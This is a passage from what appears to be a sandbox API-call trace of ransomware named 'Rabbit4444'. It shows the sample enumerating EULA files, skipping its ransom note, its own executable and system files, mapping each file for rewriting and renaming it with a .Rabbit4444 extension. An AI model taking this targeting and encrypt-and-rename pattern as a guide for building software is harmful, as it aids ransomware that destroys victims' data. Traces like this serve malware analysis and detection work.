hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.571] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13888208391) returned 1 [0047.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0047.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0047.571] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.572] CloseHandle (hObject=0x298) returned 1 [0047.572] CloseHandle (hObject=0x278) returned 1 [0047.575] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.Rabbit4444") returned 63 [0047.575] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.576] InterlockedExchangeAdd (in: Addend=0xff618, Value=81824 | out: Addend=0xff618) returned 13133088 [0047.576] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3186 [0047.576] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea400ac7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea400ac7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10ac4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pt-br.htm", cAlternateFileName="EULA_P~2.HTM")) returned 1 [0047.576] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.576] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.576] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="Rabbit4444.exe") returned -1 [0047.576] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2=".") returned 1 [0047.576] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="..") returned 1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="windows") returned -1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="bootmgr") returned 1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="pagefile.sys") returned -1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="boot") returned 1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="ids.txt") returned -1 [0047.577] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="NTUSER.DAT") returned -1 [0047.577] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_pt-br.htm" | out: lpString1="EULA_pt-br.htm") returned="EULA_pt-br.htm" [0047.577] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm", dwFileAttributes=0x0) returned 1 [0047.577] lstrlenW (lpString="EULA_pt-br.htm") returned 14 [0047.577] lstrlenW (lpString="Rabbit4444") returned 10 [0047.577] lstrcmpiW (lpString1="_pt-br.htm", lpString2="Rabbit4444") returned -1 [0047.577] lstrlenW (lpString=".dll") returned 4 [0047.577] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.577] lstrlenW (lpString=".lnk") returned 4 [0047.577] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.577] lstrlenW (lpString=".ini") returned 4 [0047.577] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.577] lstrlenW (lpString=".sys") returned 4 [0047.577] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.578] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.578] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.578] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13888843575) returned 1 [0047.578] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=68292) returned 1 [0047.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0047.578] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10dd0, lpName=0x0) returned 0x298 [0047.579] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10dd0) returned 0x70000 [0047.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.583] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13889342099) returned 1 [0047.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0047.583] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.583] CloseHandle (hObject=0x298) returned 1 [0047.583] CloseHandle (hObject=0x278) returned 1 [0047.586] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.Rabbit4444") returned 63 [0047.586] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.586] InterlockedExchangeAdd (in: Addend=0xff618, Value=68304 | out: Addend=0xff618) returned 13214912 [0047.586] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3191 [0047.586] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea401e7f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea401e7f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1158e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pt-pt.htm", cAlternateFileName="EULA_P~3.HTM")) returned 1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="Rabbit4444.exe") returned -1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2=".") returned 1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="..") returned 1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="windows") returned -1 [0047.586] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="bootmgr") returned 1 [0047.587] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="pagefile.sys") returned -1 [0047.587] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="boot") returned 1 [0047.587] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="ids.txt") returned -1 [0047.587] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="NTUSER.DAT") returned -1 [0047.587] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_pt-pt.htm" | out: lpString1="EULA_pt-pt.htm") returned="EULA_pt-pt.htm" [0047.587] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm", dwFileAttributes=0x0) returned 1 [0047.587] lstrlenW (lpString="EULA_pt-pt.htm") returned 14 [0047.587] lstrlenW (lpString="Rabbit4444") returned 10 [0047.587] lstrcmpiW (lpString1="_pt-pt.htm", lpString2="Rabbit4444") returned -1 [0047.587] lstrlenW (lpString=".dll") returned 4 [0047.587] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.587] lstrlenW (lpString=".lnk") returned 4 [0047.587] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.587] lstrlenW (lpString=".ini") returned 4 [0047.587] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.587] lstrlenW (lpString=".sys") returned 4 [0047.587] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.587] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.587] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.587] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13889826414) returned 1 [0047.588] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=71054) returned 1 [0047.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0047.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0047.588] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11890, lpName=0x0) returned 0x298 [0047.589] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11890) returned 0x70000 [0047.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.593] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13890352763) returned 1 [0047.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0047.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0047.593] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.594] CloseHandle (hObject=0x298) returned 1 [0047.594] CloseHandle (hObject=0x278) returned 1 [0047.596] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.Rabbit4444") returned 63 [0047.596] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.597] InterlockedExchangeAdd (in: Addend=0xff618, Value=71056 | out: Addend=0xff618) returned 13283216 [0047.597] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3195 [0047.597] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5c6190, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5c6190, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ro-ro.htm", cAlternateFileName="EULA_R~1.HTM")) returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="Rabbit4444.exe") returned -1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2=".") returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="..") returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="windows") returned -1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="bootmgr") returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="pagefile.sys") returned -1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="boot") returned 1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="ids.txt") returned -1 [0047.597] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="NTUSER.DAT") returned -1 [0047.597] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_ro-ro.htm" | out: lpString1="EULA_ro-ro.htm") returned="EULA_ro-ro.htm" [0047.597] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm", dwFileAttributes=0x0) returned 1 [0047.598] lstrlenW (lpString="EULA_ro-ro.htm") returned 14 [0047.598] lstrlenW (lpString="Rabbit4444") returned 10 [0047.598] lstrcmpiW (lpString1="_ro-ro.htm", lpString2="Rabbit4444") returned -1 [0047.598] lstrlenW (lpString=".dll") returned 4 [0047.598] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.598] lstrlenW (lpString=".lnk") returned 4 [0047.598] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.598] lstrlenW (lpString=".ini") returned 4 [0047.598] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.598] lstrlenW (lpString=".sys") returned 4 [0047.598] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.598] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.598] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.598] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13890925683) returned 1 [0047.599] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=78176) returned 1 [0047.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0047.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0047.599] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13460, lpName=0x0) returned 0x298 [0047.600] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13460) returned 0x70000 [0047.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.604] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13891459899) returned 1 [0047.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0047.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0047.604] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.605] CloseHandle (hObject=0x298) returned 1 [0047.605] CloseHandle (hObject=0x278) returned 1 [0047.608] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.Rabbit4444") returned 63 [0047.608] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.609] InterlockedExchangeAdd (in: Addend=0xff618, Value=78176 | out: Addend=0xff618) returned 13354272 [0047.609] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3200 [0047.609] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x454cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ru-ru.htm", cAlternateFileName="EULA_R~2.HTM")) returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="Rabbit4444.exe") returned -1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2=".") returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="..") returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="windows") returned -1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="bootmgr") returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="pagefile.sys") returned -1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="boot") returned 1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="ids.txt") returned -1 [0047.609] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="NTUSER.DAT") returned -1 [0047.609] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_ru-ru.htm" | out: lpString1="EULA_ru-ru.htm") returned="EULA_ru-ru.htm" [0047.609] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm", dwFileAttributes=0x0) returned 1 [0047.610] lstrlenW (lpString="EULA_ru-ru.htm") returned 14 [0047.610] lstrlenW (lpString="Rabbit4444") returned 10 [0047.610] lstrcmpiW (lpString1="_ru-ru.htm", lpString2="Rabbit4444") returned -1 [0047.610] lstrlenW (lpString=".dll") returned 4 [0047.610] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.610] lstrlenW (lpString=".lnk") returned 4 [0047.610] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.610] lstrlenW (lpString=".ini") returned 4 [0047.610] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.610] lstrlenW (lpString=".sys") returned 4 [0047.610] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.610] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.610] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.610] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13892119804) returned 1 [0047.610] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=283852) returned 1 [0047.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0047.611] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x457d0, lpName=0x0) returned 0x298 [0047.612] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x457d0) returned 0x70000 [0047.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0047.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0047.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.620] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13893124378) returned 1 [0047.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0047.621] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.623] CloseHandle (hObject=0x298) returned 1 [0047.623] CloseHandle (hObject=0x278) returned 1 [0047.630] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.Rabbit4444") returned 63 [0047.630] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.631] InterlockedExchangeAdd (in: Addend=0xff618, Value=283856 | out: Addend=0xff618) returned 13432448 [0047.631] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 3205 [0047.631] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14021, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sk-sk.htm", cAlternateFileName="EULA_S~1.HTM")) returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="Rabbit4444.exe") returned -1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2=".") returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="..") returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="windows") returned -1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="bootmgr") returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="pagefile.sys") returned -1 [0047.631] lstrcmpiW 